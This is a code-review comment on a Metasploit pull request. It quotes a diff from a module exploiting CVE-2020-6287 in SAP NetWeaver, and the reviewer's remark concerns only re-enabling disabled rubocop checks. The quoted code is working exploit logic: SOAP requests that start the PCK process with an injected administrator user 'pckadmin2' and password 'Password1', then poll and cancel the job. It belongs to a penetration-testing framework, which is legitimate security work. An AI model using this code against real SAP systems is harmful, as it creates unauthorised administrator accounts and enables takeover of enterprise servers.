modules/auxiliary/admin/sap/cve_2020_6287_ws_add_user.rb

```diff
@@ -0,0 +1,248 @@
+          <PCKAdmin>
+            <userName>pckadmin2</userName>
+            <password secure="true">Password1</password>
+          </PCKAdmin>
+        </Usermanagement>
+      </PCK>
+    ENVELOPE
+
+    envelope = Nokogiri::XML(<<-ENVELOPE, nil, nil, Nokogiri::XML::ParseOptions::NOBLANKS).root.to_xml(indent: 0, save_with: 0)
+      <soapenv:Envelope xmlns:soapenv="http://schemas.xmlsoap.org/soap/envelope/" xmlns:urn="urn:CTCWebServiceSi">
+        <soapenv:Header/>
+        <soapenv:Body>
+          <urn:execute>
+              <identifier>
+                <component>sap.com/tc~lm~config~content</component>
+                <path>content/Netweaver/PI_PCK/PCK/PCKProcess.cproc</path>
+             </identifier>
+             <contextMessages>
+                <baData>#{Rex::Text.encode_base64(message[:data])}</baData>
+                <name>#{message[:name]}</name>
+             </contextMessages>
+          </urn:execute>
+         </soapenv:Body>
+      </soapenv:Envelope>
+    ENVELOPE
+
+    res = send_request_soap(envelope)
+    fail_with(Failure::UnexpectedReply, 'Failed to start the PCK Upgrade process') unless res&.code == 200
+
+    session_id = res.get_xml_document.xpath('//return/text()').to_s
+    WebServiceJob.new(self, session_id)
+  end
+end
+
+class WebServiceJob
+  def initialize(mod, session_id)
+    @mod = mod
+    @session_id = session_id
+  end
+
+  def cancel_execution
+    envelope = Nokogiri::XML(<<-ENVELOPE, nil, nil, Nokogiri::XML::ParseOptions::NOBLANKS).root.to_xml(indent: 0, save_with: 0)
+      <soapenv:Envelope xmlns:soapenv="http://schemas.xmlsoap.org/soap/envelope/" xmlns:urn="urn:CTCWebServiceSi">
+         <soapenv:Header/>
+         <soapenv:Body>
+            <urn:cancelExecution>
+               <sessionId>#{@session_id.encode(xml: :text)}</sessionId>
+            </urn:cancelExecution>
+         </soapenv:Body>
+      </soapenv:Envelope>
+    ENVELOPE
+    res = send_request_soap(envelope)
+    fail_with(Failure::UnexpectedReply, 'Failed to cancel execution') if res.nil?
+
+    res.get_xml_document.xpath('//return/text()').to_s != 'false'
+  end
+
+  def get_event # rubocop:disable Naming/AccessorMethodName
+    envelope = Nokogiri::XML(<<-ENVELOPE, nil, nil, Nokogiri::XML::ParseOptions::NOBLANKS).root.to_xml(indent: 0, save_with: 0)
+      <soapenv:Envelope xmlns:soapenv="http://schemas.xmlsoap.org/soap/envelope/" xmlns:urn="urn:CTCWebServiceSi">
+         <soapenv:Header/>
+         <soapenv:Body>
+            <urn:getNextEvent>
+               <sessionId>#{@session_id.encode(xml: :text)}</sessionId>
+            </urn:getNextEvent>
+         </soapenv:Body>
+      </soapenv:Envelope>
+    ENVELOPE
+    res = send_request_soap(envelope)
+    fail_with(Failure::UnexpectedReply, 'Failed to retrieve the event information') if res.nil?
+
+    Nokogiri::XML(Rex::Text.decode_base64(res.get_xml_document.xpath('//return/text()')))
+  end
+
+  def has_events_available? # rubocop:disable Naming/PredicateName
```

Comment:
It is desirable to reenable temporarily disabled cops:

https://github.com/rapid7/metasploit-framework/blob/613c37f9d81ec0a7b5eb586af7c483826316b7cd/lib/msf/core/exploit/zeromq.rb#L136-L138

Not gonna push hard on this, but if we use this to make future CI exceptions, we should be consistent about it.